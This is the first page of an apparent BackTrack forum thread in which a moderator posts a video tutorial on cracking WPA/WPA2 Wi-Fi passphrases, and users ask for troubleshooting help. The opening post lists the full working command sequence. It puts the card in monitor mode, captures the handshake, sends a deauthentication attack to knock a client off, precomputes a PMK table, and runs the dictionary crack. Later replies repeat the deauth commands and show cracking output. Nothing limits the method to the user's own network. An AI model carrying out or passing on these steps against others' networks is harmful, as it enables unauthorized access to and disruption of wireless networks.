Page 1 of 3 123 LastLast
Results 1 to 10 of 51

Thread: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2318855/
    Download video: http://www.mediafire.com/?kn0b37v79rptd9e


    What is this?
    How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have same method!) . Then using a pre-computed hash table which has been "pre-salted" with the ESSID for the network to get the pass-phrase.


    How does this work?
    > Captures a 4-way handshake
    > Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
    > Apply a brute force dictionary attack to the handshake


    What do I need?

    > aircrack-ng suite
    > WiFi Card that supports monitor mode
    > Big dictionary
    > Processing power


    Software
    Name: Aircrack-ng
    Version: 1.0-rc3
    Home Page: http://www.aircrack-ng.org/doku.php
    Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz


    Commands:

    Code:
    airmon-ng start wlan0
    
    airodump-ng mon0
    airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
    
    aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0
    
    airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
    kate ~/essid
    airolib-ng crackwpa --import essid ~/essid
    airolib-ng crackwpa --stats
    airolib-ng crackwpa --clean all
    airolib-ng crackwpa --batch
    airolib-ng crackwpa --verify all
    
    aircrack-ng -r crackwpa output*.cap



    Notes:

    This is cut from my final video called "g0tmi1k's home network".
    There HAS to be a CONNECT client.
    The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

    Song: Sub Focus - Rock It
    Video length: 03:53
    Capture length: 04:03

    Blog Post:http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1656-%5Bvideo%5D-how-crack-wpa-wpa2-aircrack-ng-airolib-ng.html
    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
    Last edited by g0tmi1k; 03-05-2011 at 04:31 PM.
    Have you...g0tmi1k?

  2. #2
    Member m0j4h3d's Avatar
    Join Date
    Jan 2010
    Posts
    84

    Default Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    thanks for the post .. but same problem .. need big dictionary .. but it could be solved if having good luck
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    16

    Default Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    m0j4h3d...try john the ripper and crunch for that...but it can take a long..long...time

    c

  4. #4
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    Quote Originally Posted by m0j4h3d View Post
    thanks for the post .. but same problem .. need big dictionary .. but it could be solved if having good luck
    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
    Have you...g0tmi1k?

  5. #5
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    Location
    shining my spoon
    Posts
    265

    Default Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    What about using genpmk and the essid to pre-compute your hash files, and then cracking with cowpatty? Right now i'm actually torrenting the shmoo top 1000 essids rainbow tables to assist me in cracking, which is probably the best thing about having a laptop that's specifically being used for running bt4 im already filling up my 250 GB drive with hashes and dictionaries far beyond those that are in the repo's.

  6. #6
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    Quote Originally Posted by gunrunr View Post
    What about using genpmk and the essid to pre-compute your hash files, and then cracking with cowpatty? Right now i'm actually torrenting the shmoo top 1000 essids rainbow tables to assist me in cracking, which is probably the best thing about having a laptop that's specifically being used for running bt4 im already filling up my 250 GB drive with hashes and dictionaries far beyond those that are in the repo's.
    Hello,
    I did a video on my blog of Aircrack-ng vs coWPAtty, comparing the speeds & time it takes to crack, and Ive now posted it here for you:
    http://www.backtrack-linux.org/forum....html#post8094
    and yes, Ive also got a torrent on the go, seeding a few hashes & dictionaries myself!
    Have you...g0tmi1k?

  7. #7
    Just burned his ISO
    Join Date
    May 2010
    Posts
    1

    Default Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    Thanks,
    Nice share , I hav'nt seen such gr8 explaination elsewhere

    But I am facing some problems !!! Can u PLease HELP ME ??

    I hav successfully executed commands :
    airmon-ng start wlan0

    airodump-ng mon0
    airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
    But the command "aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0"
    NOT working properly as shown in fig ..

    http://img210.imageshack.us/img210/4444/77296826.jpg

    Can u tell me What is problem der ?
    Also Please help me 2 solve this problem !!!!!

    Thank U !!! Waiting !!!


    MOD EDIT: Removed Huge Picture. Left Link in place.
    Last edited by Archangel-Amael; 05-19-2010 at 05:07 PM. Reason: See Above

  8. #8
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    2

    Default Re: [Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)

    I did something wrong, didn't find key








    root@bt:~# aircrack-ng -r crackwpa output*.cap
    Opening output-01.cap
    Opening output-02.cap
    Read 220329 packets.

    # BSSID ESSID Encryption



    1 BSSID SHOWN HERE Batman Strikes WPA (1 handshake)

    Choosing first network as target.

    Opening output-01.cap
    Opening output-02.cap
    Reading packets, please wait...



    Aircrack-ng 1.0 r164
    Quitting aircrack-ng...

  9. #9
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)

    Quote Originally Posted by Desert View Post
    Thank for the Great Tutorial
    But i have on question !!
    What tha meaning of Big dictionary ?
    Becouse it didn't work for me when I reach Thisi command

    aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

    Nothing Happen and a new command line appear
    Thank u Again
    The dictionary has no effect on that command. You need a big dictionary, because the chance of it having the pass-phrase is increased.
    Are you sure they are the correct MAC address (and the right away around?)
    If it doesnt work - try and manually disconnect and reconnect - see if you can get the handshake that way.


    Quote Originally Posted by btrack4 View Post
    Please help me.
    I use a usb to boot backtrack .I have a dictionary.txt in usb but I dont know how to access to this file when I crack (aircrack-ng -w...???) . Thank !
    excuse for my english!
    Mount it?
    Im guessing your going to need konqueror...


    Quote Originally Posted by longjidin View Post
    ni tutorial g0tm1lk keep up the good work.....!!
    Thanks for the thanks!


    Quote Originally Posted by gibbsfan19 View Post
    I did something wrong, didn't find key








    root@bt:~# aircrack-ng -r crackwpa output*.cap
    Opening output-01.cap
    Opening output-02.cap
    Read 220329 packets.

    # BSSID ESSID Encryption



    1 BSSID SHOWN HERE Batman Strikes WPA (1 handshake)

    Choosing first network as target.

    Opening output-01.cap
    Opening output-02.cap
    Reading packets, please wait...



    Aircrack-ng 1.0 r164
    Quitting aircrack-ng...
    I think the problem is the pass-phrase isn't in the dictionary. Open the dictionary (either kate or cat/grep) and check that it is in there
    Have you...g0tmi1k?

  10. #10
    Junior Member
    Join Date
    Aug 2010
    Posts
    48

    Default Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    I had a bad experience when using cowpatty. After throwing the key into the middle of a list, and following the commands set out for me, the key was not found. although, it did go through the PMK's extremley fast. Luckyly i use a beefed up laptop

Page 1 of 3 123 LastLast

Similar Threads

  1. About BT4 Aircrack-ng no handshake FIX
    By Swisher in forum Beginners Forum
    Replies: 2
    Last Post: 02-25-2010, 08:12 PM
  2. how do you crack wpa2's?
    By lacyus in forum Beginners Forum
    Replies: 9
    Last Post: 02-25-2010, 04:29 AM
  3. Wireless (WPA2 PSK) Configuration
    By hepgul in forum BackTrack Howtos
    Replies: 0
    Last Post: 02-11-2010, 02:21 PM
  4. BT4 and AirCrack IV generation
    By ellimistx99 in forum Beginners Forum
    Replies: 4
    Last Post: 01-24-2010, 07:40 PM
  5. aircrack-ng wpa problems ?
    By capron in forum Beginners Forum
    Replies: 5
    Last Post: 01-13-2010, 10:43 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •